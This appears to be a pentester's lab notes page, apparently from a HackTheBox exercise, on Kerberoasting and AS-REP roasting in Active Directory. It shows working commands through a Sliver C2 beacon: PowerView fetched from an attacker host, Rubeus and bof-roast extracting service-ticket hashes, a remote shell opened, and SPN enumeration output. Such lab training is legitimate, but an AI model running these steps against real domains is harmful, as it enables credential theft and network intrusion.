Exploit Kerberos

Checking SPNs on service accounts starting with setting up a pivot.

Kerberoasting

Using sharpsh we can enumerate kerberoastable account

# Encode base64
mczen@htb[/htb]$ echo "Get-NetUser -spn | select samaccountname,description" | base64
R2V0LU5ldFVzZXIgLXNwbiB8IHNlbGVjdCBzYW1hY2NvdW50bmFtZSxkZXNjcmlwdGlvbgo=

# Send PowerView command
sharpsh -- '-u http://10.10.14.62:8080/PowerView.ps1 -e -c "R2V0LU5ldFVzZXIgLXNwbiB8IHNlbGVjdCBzYW1hY2NvdW50bmFtZSxkZXNjcmlwdGlvbgo="'

Then use Rubeus to Kerberoast

inline-execute-assembly /home/kali/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'

Or use c2tc

c2tc-kerberoast roast alices

AS-REP Roasting

inline-execute-assembly /home/kali/Rubeus.exe 'asreproast /format:hashcat /user:bob /nowrap'

Native aproach

Drop into a shell and use setspn.exe -Q /.

sliver (http-beacon) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
[*] Started remote shell with pid 3360

PS C:\Users\eric\Desktop> setspn.exe -Q */*
setspn.exe -Q */*
Checking domain DC=child,DC=htb,DC=local
CN=svc sql,OU=Service Account,DC=child,DC=htb,DC=local
	MSSQLSvc/srv02.child.htb.local:1433
	MSSQLSvc/srv02.child.htb.local:DB02
	MSSQLSvc/srv01.child.htb.local:1433
	MSSQLSvc/srv01.child.htb.local:DB01
CN=alice,CN=Users,DC=child,DC=htb,DC=local
	rdp/web01.child.htb.local

Using the bof-roast utility we can get the hash of Alice and convert it to a ticket using apreq2hashcat.py.

sliver (http-beacon) > bof-roast rdp/web01.child.htb.local

[*] Successfully executed bof-roast (coff-loader)
[*] Got output:
[+] Target SPN: rdp/web01.child.htb.local
[+] Got Ticket! Convert it with apreq2hashcat.py YIIGUgYJKoZIhvcSAQICAQBuggZBMIIGPaADAgEFoQMCAQ6iBwMFACAAAACjggRpYYIEZTCCBGGgAwIBBaERGw9DSElMRC5IVEIuTE9DQUyiJzAl <SNIP> CGqE=

Last updated

Was this helpful?